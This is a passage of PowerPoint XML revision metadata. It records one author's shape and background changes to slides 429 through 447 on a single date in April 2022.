          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1051993686" sldId="429"/>
            <ac:spMk id="2" creationId="{13CDC2D7-2868-43F5-8FA3-14F9C4D1D1D2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1051993686" sldId="429"/>
            <ac:spMk id="6" creationId="{957FDD44-C950-4BF7-B38E-9DA0831D27D0}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1388854055" sldId="430"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1388854055" sldId="430"/>
            <ac:spMk id="2" creationId="{D242943B-A8F0-4A31-8F82-2813E57479B1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1388854055" sldId="430"/>
            <ac:spMk id="3" creationId="{5A7AA4AE-D5F3-4234-9EF8-74A82A80CA51}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4192093409" sldId="431"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4192093409" sldId="431"/>
            <ac:spMk id="2" creationId="{F6775B68-C9E1-45F5-9992-59D48B4E9175}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4192093409" sldId="431"/>
            <ac:spMk id="3" creationId="{FE9678E5-23C2-4048-959E-8C86456DDB24}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4192093409" sldId="431"/>
            <ac:spMk id="4" creationId="{C771C1FC-207B-4BE3-869D-F54F5BB3A8C3}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4057776499" sldId="432"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4057776499" sldId="432"/>
            <ac:spMk id="2" creationId="{7777DB44-5846-44B5-9FD8-29533D5098F7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4057776499" sldId="432"/>
            <ac:spMk id="3" creationId="{502342C2-B7B2-4F20-A0F6-F2B57459658E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1905389624" sldId="433"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1905389624" sldId="433"/>
            <ac:spMk id="2" creationId="{0BE4E4C9-F1F3-44EB-8A79-B4A2C3019718}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1905389624" sldId="433"/>
            <ac:spMk id="3" creationId="{36267F68-4248-47AE-BDA0-47B00F25BC76}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2723788720" sldId="434"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2723788720" sldId="434"/>
            <ac:spMk id="2" creationId="{FB29E30B-5C8A-43F6-835A-5F43C74E83E4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2723788720" sldId="434"/>
            <ac:spMk id="3" creationId="{0850C0BF-C3DD-4252-BD6D-AE30201D53EF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2723788720" sldId="434"/>
            <ac:spMk id="4" creationId="{81CB0C9A-E844-4D7A-B0AE-002FBB665003}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2005541914" sldId="435"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2005541914" sldId="435"/>
            <ac:spMk id="2" creationId="{13CDC2D7-2868-43F5-8FA3-14F9C4D1D1D2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2005541914" sldId="435"/>
            <ac:spMk id="6" creationId="{957FDD44-C950-4BF7-B38E-9DA0831D27D0}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1152779773" sldId="436"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1152779773" sldId="436"/>
            <ac:spMk id="2" creationId="{92F7FA55-0E8D-41A7-8155-E2815A374CB4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1152779773" sldId="436"/>
            <ac:spMk id="3" creationId="{1F2E6335-A3A9-4073-9B33-5BB563A1C39A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3756039627" sldId="437"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3756039627" sldId="437"/>
            <ac:spMk id="2" creationId="{137D2B7F-8821-4893-84CB-C21E84B7264A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3756039627" sldId="437"/>
            <ac:spMk id="3" creationId="{CE3AF8D3-71F5-4E57-B6BA-3636FBAFE43C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3756039627" sldId="437"/>
            <ac:spMk id="4" creationId="{85BF65AD-401A-4E00-AEC0-1D7D0921EC09}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4271116972" sldId="438"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4271116972" sldId="438"/>
            <ac:spMk id="2" creationId="{137D2B7F-8821-4893-84CB-C21E84B7264A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4271116972" sldId="438"/>
            <ac:spMk id="3" creationId="{CE3AF8D3-71F5-4E57-B6BA-3636FBAFE43C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4271116972" sldId="438"/>
            <ac:spMk id="4" creationId="{85BF65AD-401A-4E00-AEC0-1D7D0921EC09}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1039995885" sldId="439"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1039995885" sldId="439"/>
            <ac:spMk id="2" creationId="{137D2B7F-8821-4893-84CB-C21E84B7264A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1039995885" sldId="439"/>
            <ac:spMk id="3" creationId="{CE3AF8D3-71F5-4E57-B6BA-3636FBAFE43C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="98148142" sldId="440"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="98148142" sldId="440"/>
            <ac:spMk id="2" creationId="{B354811C-8C8F-45EE-B10C-24208B295E68}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="98148142" sldId="440"/>
            <ac:spMk id="3" creationId="{769819B4-D1C3-457A-AC21-4312771C3191}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4113966330" sldId="441"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4113966330" sldId="441"/>
            <ac:spMk id="2" creationId="{2733BABC-8761-4715-8700-30D50FAB9BAA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4113966330" sldId="441"/>
            <ac:spMk id="3" creationId="{78E22C71-FDC7-4C88-B5D0-310B7F02AAC7}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3108392394" sldId="442"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3108392394" sldId="442"/>
            <ac:spMk id="2" creationId="{D99FBFBE-7A9E-4D90-92BF-CA2F9C440284}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3108392394" sldId="442"/>
            <ac:spMk id="3" creationId="{6622BB0D-FBAC-4350-BCFA-5C38C08151F8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3108392394" sldId="442"/>
            <ac:spMk id="4" creationId="{5FCF6D31-CCB3-405F-8A31-8C3BD4FAA9CC}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2491006909" sldId="443"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2491006909" sldId="443"/>
            <ac:spMk id="2" creationId="{77133F6B-E0D5-409D-A4AB-227E42828370}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2491006909" sldId="443"/>
            <ac:spMk id="3" creationId="{2A33E53A-9976-472D-8607-A3BF64D072E9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2491006909" sldId="443"/>
            <ac:spMk id="4" creationId="{43CCCCB0-EF80-4A26-A179-1E1BF1EEA046}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="176694557" sldId="444"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="176694557" sldId="444"/>
            <ac:spMk id="2" creationId="{B0A6527A-6BD2-4B65-9AEA-B23A4A79EB07}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="176694557" sldId="444"/>
            <ac:spMk id="3" creationId="{B02240E1-2027-4F1E-A602-4B91608BD8CF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="176694557" sldId="444"/>
            <ac:spMk id="4" creationId="{FE3D4283-0F63-4432-934A-8B6459399A85}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3801599814" sldId="445"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3801599814" sldId="445"/>
            <ac:spMk id="2" creationId="{DDB9F490-8FCF-4417-AFC4-5F8DF8EFA2D6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3801599814" sldId="445"/>
            <ac:spMk id="3" creationId="{D5C1624A-319F-4968-B644-38B2319A7CAB}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="544565650" sldId="446"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="544565650" sldId="446"/>
            <ac:spMk id="2" creationId="{4C63016E-0ED6-441E-AA4E-3751C2BAB8AE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="544565650" sldId="446"/>
            <ac:spMk id="3" creationId="{BA3F0A10-1A3C-49F8-9EE0-1936CFD49754}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1304412239" sldId="447"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1304412239" sldId="447"/>
            <ac:spMk id="2" creationId="{C0389950-21C5-4304-B74E-09D2C86193A2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1304412239" sldId="447"/>
            <ac:spMk id="3" creationId="{63993D13-2042-400B-A5D9-7A0898D23F97}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
